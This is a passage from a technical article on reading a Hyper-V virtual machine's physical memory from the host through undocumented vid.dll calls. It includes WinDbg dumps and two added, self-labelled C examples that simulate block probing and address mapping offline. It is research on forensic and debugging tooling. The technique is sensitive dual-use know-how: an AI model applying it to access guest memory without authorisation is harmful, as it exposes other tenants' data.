<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<a href="https://github.com/comaeio/LiveCloudKd/blob/07ac5901ff5cac5258033f1dd95cfc2bd0e06815/hvdd/memoryblock.c#L159" style="text-decoration: none;"><span style="background-color: transparent; color: #0563c1; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">https://github.com/comaeio/LiveCloudKd/blob/07ac5901ff5cac5258033f1dd95cfc2bd0e06815/hvdd/memoryblock.c#L159</span></a><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> (buffer contains memory of vmwp.exe)</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 98px; overflow: hidden; width: 244px;"><img height="98" src="https://lh4.googleusercontent.com/XmkUKzsZ0RcwbIvgN7XlgFOpxdAI8flDcheg7stuIHr8fpw83XrR6gbAkklUHeM2P35M1aMzO2QRzpTYhffEYmQazZPcuup_zqoF8Z15U5hCbMrDGtHElvRQoptRsEBOWLizsNQ" style="margin-left: 0px; margin-top: 0px;" width="244" /></span></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">StartMbp is an index equal to the physical memory page number. We just need to take the GPA and divide it by PAGE_SIZE (0x1000). The page size here is the virtual one: for example, the ntoskrnl.exe image is usually mapped with 2 MB large pages, but the page numbers are still 4 KB granular for that region. A smaller buffer can be specified, in which case less data will be written to it. Everything is clear, with one exception: this index is relative to the beginning of the MB_HANDLE MemoryBlock. For example, for the first memory block the index matches the physical memory page number. If the blocks were placed contiguously, the index in the second block would equal the page number minus the size of the first block, and the index in the third block would equal the page number minus the sizes of the first and second blocks. That seems clear enough. The main problem is that physical memory blocks are not contiguous. Moreover, their boundaries cannot be easily determined from user mode: Microsoft has never provided such an API, not even back in Windows Server 2008 R2.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 357px; overflow: hidden; width: 441px;"><img height="357" src="https://lh3.googleusercontent.com/2DleH1sU5W-tv31uPVOi1bN2HigMTJPt1vleaVrObRiNDWCA-ZihuHvFAHRXrvwds6nWZKPRkPxER2RebNYEAuo_ZM2CjbEUGUPHoowQMDJYBDdG2V8th9dYBZilkwsSV5a5Om8" style="margin-left: 0px; margin-top: 0px;" width="441" /></span></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Matt used a separate function for searching descriptors in memory, but Microsoft closed this opportunity by replacing the descriptors with their indexes in a table located in kernel mode, so I used the vid.dll!VidReadMemoryBlockPageRange function.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 101px; overflow: hidden; width: 563px;"><img height="101" src="https://lh3.googleusercontent.com/qnofeEua80IAysi1uFreBbb8ZUgVO71IbK4U_eb_FEhua1q25S1GHyEQehMinAu1P66YawvQVgz5lUfuu3bX2KUxW9dE9p1Fr2rkTWnn2C9XW5XnLXzlMGjcTCGV5WxRrghGWy0" style="margin-left: 0px; margin-top: 0px;" width="563" /></span></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">First, we can get the handle numbers by a simple search: read the first memory page of each block. If the function returns TRUE, the block exists; if FALSE, it doesn’t. Based on practical experience, I determined the maximum size of the index to be 0x400. As we saw above, a large number of indexes is observed only for containers such as WDAG and Windows Sandbox, because each file is mapped in a separate block.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Once we have the array of indexes, we can determine the size of each block with a slightly modified binary search over its page range.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 237px; overflow: hidden; width: 485px;"><img height="237" src="https://lh5.googleusercontent.com/UlkhzfSi7t_5QIaB89b-ENSuyIOSljcAiX5aqoa380XPTFI1Zl04azyuNoW37yFLd_RIWqlnFKLFUU9SGmb5MvI7yWEkj-nVwloBl-SxxlmQMtSUCflnuSRhEUGaqjQDLJ8MIbc" style="margin-left: 0px; margin-top: 0px;" width="485" /></span></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">We know that a memory block is contiguous, so we can find its boundary with one condition: a read of the block must not spill into the next block. So we can first scan the memory and build an initial memory map. But, as I wrote above, there are gaps between the blocks, so to refine the layout we have to examine the _PHYSICAL_MEMORY_DESCRIPTOR structure in the guest OS.</span></div>
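<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The three steps above (probe every index, bisect for the block size, check the boundary) as an added example; this is not code from the article or from the hvmm / LiveCloudKd sources. On a real host the probe would be a call to vid.dll!VidReadMemoryBlockPageRange, whose signature is undocumented and is not reproduced here; only its TRUE/FALSE contract is modelled by a callback, and the block table it reads from is constructed so the program runs offline. The 0x400 index limit comes from the text; the bisection ceiling PROBE_LIMIT_PAGES is an assumption.</span></div>

```c
/* Added example, not code from the article or from the hvmm / LiveCloudKd
 * sources: the probe-and-bisect procedure from the text, run against a
 * constructed in-memory block table so it executes offline. On a real host
 * the probe would call vid.dll!VidReadMemoryBlockPageRange (undocumented;
 * only its "TRUE = readable, FALSE = not readable" contract is modelled). */
#include <inttypes.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

#define MAX_BLOCK_INDEX   0x400          /* empirical index limit from the text */
#define PROBE_LIMIT_PAGES (1ULL << 36)   /* assumed ceiling for the bisection (256 GiB) */

/* Constructed stand-in for the partition's block table: index -> page count, 0 = no block. */
static uint64_t g_block_pages[MAX_BLOCK_INDEX];

/* A probe reports whether pages [start, start + count) of block `index` can be read. */
typedef bool (*probe_fn)(uint64_t index, uint64_t start, uint64_t count);

static bool fake_probe(uint64_t index, uint64_t start, uint64_t count) {
    if (index >= MAX_BLOCK_INDEX) return false;
    uint64_t n = g_block_pages[index];
    return n != 0 && count != 0 && start < n && count <= n - start;
}

/* Populate the constructed table; handle indexes need not be contiguous. */
void setup_example_blocks(void) {
    for (uint64_t i = 0; i < MAX_BLOCK_INDEX; i++) g_block_pages[i] = 0;
    g_block_pages[0] = 0x100;
    g_block_pages[1] = 0x27b;
    g_block_pages[3] = 0x60000;
    g_block_pages[9] = 0x800;     /* e.g. a video memory block */
}

/* Step 1: find existing blocks by reading page 0 of every candidate index. */
size_t enumerate_blocks(probe_fn probe, uint64_t *out, size_t cap) {
    size_t found = 0;
    for (uint64_t i = 0; i < MAX_BLOCK_INDEX && found < cap; i++)
        if (probe(i, 0, 1)) out[found++] = i;
    return found;
}

/* Step 2: bisect for the page count. A block is contiguous, so page p is
 * readable iff p < size; keep `lo` readable and `hi` unreadable until adjacent. */
uint64_t block_page_count(probe_fn probe, uint64_t index) {
    if (!probe(index, 0, 1)) return 0;
    uint64_t lo = 0, hi = PROBE_LIMIT_PAGES;
    while (hi - lo > 1) {
        uint64_t mid = lo + (hi - lo) / 2;
        if (probe(index, mid, 1)) lo = mid; else hi = mid;
    }
    return lo + 1;
}

/* Step 3: the boundary condition from the text: the whole block reads in one
 * call, and a read one page longer must fail (it would spill into the next block). */
bool block_boundary_ok(probe_fn probe, uint64_t index, uint64_t pages) {
    return pages != 0 && probe(index, 0, pages) && !probe(index, 0, pages + 1);
}

int main(void) {
    uint64_t idx[MAX_BLOCK_INDEX];
    setup_example_blocks();
    size_t n = enumerate_blocks(fake_probe, idx, MAX_BLOCK_INDEX);
    for (size_t i = 0; i < n; i++) {
        uint64_t pages = block_page_count(fake_probe, idx[i]);
        printf("block index %#" PRIx64 ": %#" PRIx64 " pages (%" PRIu64 " KiB), boundary %s\n",
               idx[i], pages, pages * 4,
               block_boundary_ok(fake_probe, idx[i], pages) ? "ok" : "BAD");
    }
    return 0;
}
```

<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The cost is one probe per candidate index plus about 36 probes per existing block, so the whole scan of a partition is cheap. The bisection relies on the block being contiguous; a table of the sizes it returns is only the initial map, because the scan says nothing about where each block sits in guest physical address space.</span></div>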
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">0: kd> dt poi(nt!MmPhysicalMemoryBlock) nt!_PHYSICAL_MEMORY_DESCRIPTOR</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x000 NumberOfRuns : 7</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x008 NumberOfPages : 0xbfee1</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x010 Run : [1] _PHYSICAL_MEMORY_RUN</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">0: kd> dq poi(nt!MmPhysicalMemoryBlock) L20</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffff8b81`91615020 00000000`0000000</span><span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">7</span><span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> 00000000`</span><span style="background-color: white; color: red; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">000bfee1 </span><span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">– </span><span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">number of runs</span><span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, </span><span style="background-color: white; color: red; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">total page count of all runs</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffff8b81`91615030 00000000`0000000</span><span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">1</span><span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> 00000000`000000</span><span style="background-color: white; color: red; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">9f</span><span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> – </span><span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">first page (PFN) of the run</span><span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, </span><span style="background-color: white; color: red; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">page count of the run</span><span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">; the remaining lines are the other six runs.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffff8b81`91615040 00000000`00000100 00000000`0000027b</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffff8b81`91615050 00000000`0000037d 00000000`00005d86</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffff8b81`91615060 00000000`00006105 00000000`00058dc0</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffff8b81`91615070 00000000`0005ef1b 00000000`00001080</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffff8b81`91615080 00000000`0005ffff 00000000`00000001</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffff8b81`91615090 00000000`00060200 00000000`00060000</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinDbg also has a command that displays the _PHYSICAL_MEMORY_DESCRIPTOR structure:</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 169px; overflow: hidden; width: 536px;"><img height="169" src="https://lh3.googleusercontent.com/QbOONv75pIxBQAdjMN14M-vLbq_U_heDiFVHtaY6hRLH1gU4MU3xaxguBevhKEcHFC4f8b_H0ERi3z29CJYxFBhiWY_RMnppm0RwHrEMW2LNXpuYRtO4tZWsf6F53-LMxRIIGVE" style="margin-left: 0px; margin-top: 0px;" width="536" /></span></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">As you can see, some guest OS memory runs fit inside a single block allocated by the hypervisor, while other guest runs correspond to hypervisor blocks of the same size that are shifted by a small offset. Since the offset is small, we can adjust our table:</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 278px; overflow: hidden; width: 525px;"><img height="278" src="https://lh5.googleusercontent.com/eMNyN_3nOSdKGhs_M-dyqz2gPiE9oN8ljr8DRFnr7WYVlcBFac1Xhjne50Cnj_zs6oPrSZZf3pq81FvJZ7urmqgQtvc0jc225G4gDUNP6VP648yC_Yh4vbvmtF-yBdFsOrb7KM8" style="margin-left: 0px; margin-top: 0px;" width="525" /></span></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The first block needs no adjustment: it is mapped 1:1, which lets us read the first block, where ntoskrnl.exe is located, and compute the _PHYSICAL_MEMORY_DESCRIPTOR values from it before applying the offset correction. I handled in the driver code the case where one guest run consists of several blocks allocated by the hypervisor, but I have not encountered that case on my test stand. The last block, 0x800 pages in size, is used for video memory, as explained above. In our virtual machine the maximum physical address that can be read is greater than the maximum address listed in _PHYSICAL_MEMORY_DESCRIPTOR; that block is not listed there, so we simply assume it follows the last guest OS run. Its offset cannot be determined without a driver in the host OS. We can assume that this memory is used by a device; it can be read, for example, with LiveCloudKd.</span></div>
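<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The table adjustment described above as an added example; this is not code from the article or from the hvmm / LiveCloudKd sources. It parses the raw qwords of the dq dump printed earlier into runs (checking that the run sizes add up to NumberOfPages), lays the blocks found by the probe step out back-to-back, then moves each block to the guest run of equal page count when the shift is small, and leaves unmatched blocks (the 1:1 first block and the trailing video block) right after their predecessor. The block sizes in example_blocks(), the 0x1000-page shift tolerance and the 0x800-page video block position are constructed for illustration; the article's real table exists only as a screenshot.</span></div>

```c
/* Added example, not code from the article or the hvmm / LiveCloudKd sources.
 * It parses the raw qwords of the `dq poi(nt!MmPhysicalMemoryBlock)` dump from
 * this page and performs the table adjustment the text describes. The vid block
 * sizes in example_blocks() and the shift tolerance are constructed. */
#include <inttypes.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#define PAGE_SHIFT 12
#define MAX_RUNS   64

typedef struct { uint64_t base_pfn, page_count; } phys_run_t;
typedef struct {
    uint64_t handle_index;  /* index handed to VidReadMemoryBlockPageRange */
    uint64_t page_count;    /* size found by the probe / bisection step */
    uint64_t gpa_base_pfn;  /* guest PFN of the block's first page */
    bool     matched;       /* a guest run of equal size fixed the base */
} vid_block_t;

/* Qwords exactly as printed by the dq command on this page. */
static const uint64_t g_descriptor_dump[] = {
    0x7,     0xbfee1,   /* NumberOfRuns, NumberOfPages       */
    0x1,     0x9f,      /* Run[0].BasePage, Run[0].PageCount */
    0x100,   0x27b,
    0x37d,   0x5d86,
    0x6105,  0x58dc0,
    0x5ef1b, 0x1080,
    0x5ffff, 0x1,
    0x60200, 0x60000,
};
#define DUMP_QWORDS (sizeof g_descriptor_dump / sizeof g_descriptor_dump[0])

/* Layout: +0x00 NumberOfRuns, +0x08 NumberOfPages, +0x10 Run[] of {BasePage, PageCount}.
 * Returns the run count, or 0 if the dump is truncated, unsorted, overlapping, or
 * the run page counts do not add up to NumberOfPages. */
size_t parse_descriptor(const uint64_t *q, size_t nq, phys_run_t *runs, size_t cap) {
    if (nq < 2 || q[0] == 0 || q[0] > cap || nq < 2 + 2 * q[0]) return 0;
    uint64_t sum = 0, prev_end = 0;
    for (uint64_t i = 0; i < q[0]; i++) {
        runs[i].base_pfn   = q[2 + 2 * i];
        runs[i].page_count = q[3 + 2 * i];
        if (runs[i].page_count == 0 || runs[i].base_pfn < prev_end) return 0;
        prev_end = runs[i].base_pfn + runs[i].page_count;
        sum += runs[i].page_count;
    }
    return sum == q[1] ? (size_t)q[0] : 0;
}

/* Initial guess: blocks back-to-back in handle order (no gaps). Then each block is
 * moved to the first unused guest run with the same page count if the shift is
 * small. Unmatched blocks (the 1:1 first block, the trailing video block) stay
 * right after the previous block. Returns the number of matched blocks. */
size_t adjust_blocks(vid_block_t *b, size_t nb, const phys_run_t *runs, size_t nr,
                     uint64_t max_shift_pages) {
    bool used[MAX_RUNS] = { false };
    size_t matched = 0;
    uint64_t next = 0;
    if (nr > MAX_RUNS) nr = MAX_RUNS;
    for (size_t i = 0; i < nb; i++) {
        b[i].gpa_base_pfn = next;
        b[i].matched = false;
        for (size_t r = 0; r < nr; r++) {
            uint64_t base  = runs[r].base_pfn;
            uint64_t shift = base > next ? base - next : next - base;
            if (used[r] || runs[r].page_count != b[i].page_count || shift > max_shift_pages)
                continue;
            b[i].gpa_base_pfn = base;
            b[i].matched = true;
            used[r] = true;
            matched++;
            break;
        }
        next = b[i].gpa_base_pfn + b[i].page_count;
    }
    return matched;
}

/* GPA -> (block handle index, page inside the block, byte offset). False in a gap. */
bool gpa_to_block(const vid_block_t *b, size_t nb, uint64_t gpa,
                  uint64_t *handle, uint64_t *page, uint64_t *offset) {
    uint64_t pfn = gpa >> PAGE_SHIFT;
    for (size_t i = 0; i < nb; i++) {
        if (pfn >= b[i].gpa_base_pfn && pfn - b[i].gpa_base_pfn < b[i].page_count) {
            *handle = b[i].handle_index;
            *page   = pfn - b[i].gpa_base_pfn;
            *offset = gpa & ((1ULL << PAGE_SHIFT) - 1);
            return true;
        }
    }
    return false;
}

/* Constructed block sizes in handle order, ending with a 0x800-page video block. */
size_t example_blocks(vid_block_t *out, size_t cap) {
    static const uint64_t sizes[] = { 0x100, 0x27b, 0x5d86, 0x58dc0, 0x1080, 0x1, 0x60000, 0x800 };
    size_t n = sizeof sizes / sizeof sizes[0];
    if (cap < n) return 0;
    for (size_t i = 0; i < n; i++) {
        out[i].handle_index = i;  out[i].page_count = sizes[i];
        out[i].gpa_base_pfn = 0;  out[i].matched = false;
    }
    return n;
}

int main(void) {
    phys_run_t runs[MAX_RUNS];
    vid_block_t blocks[16];
    size_t nr = parse_descriptor(g_descriptor_dump, DUMP_QWORDS, runs, MAX_RUNS);
    size_t nb = example_blocks(blocks, 16);
    if (!nr || !nb) return 1;
    adjust_blocks(blocks, nb, runs, nr, 0x1000);
    for (size_t i = 0; i < nb; i++)
        printf("block %" PRIu64 ": gpa %#" PRIx64 " pages %#" PRIx64 "%s\n",
               blocks[i].handle_index, blocks[i].gpa_base_pfn << PAGE_SHIFT,
               blocks[i].page_count, blocks[i].matched ? "" : " (unmatched)");
    return 0;
}
```

<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">With the dump from this page the parser yields 7 runs whose sizes sum to 0xbfee1 pages, and the gaps between runs (for example the 0x200 pages between the one-page run at 0x5ffff and the run at 0x60200) are exactly the addresses for which gpa_to_block() returns false. The equal-size match is deliberately strict; a guest run that spans several hypervisor blocks would have to be handled as a separate case, as the text notes for the driver.</span></div>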
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">After the correction we can read all of the guest OS physical memory without the driver, except the pages that were paged out to pagefile.sys.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">I finish the code description at this point. The remaining details can be found in the sources of the hvmm driver.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Additional details</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">I wrote the PyKD script ParsePrtnStructure.py for better visualization of GPAR objects and MBlock objects (the link is given at the beginning of the article). To use it, you first have to find the partition handle: run the hvmm.sys driver, which prints the value of this handle to the debugger, and then insert that value into the script.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
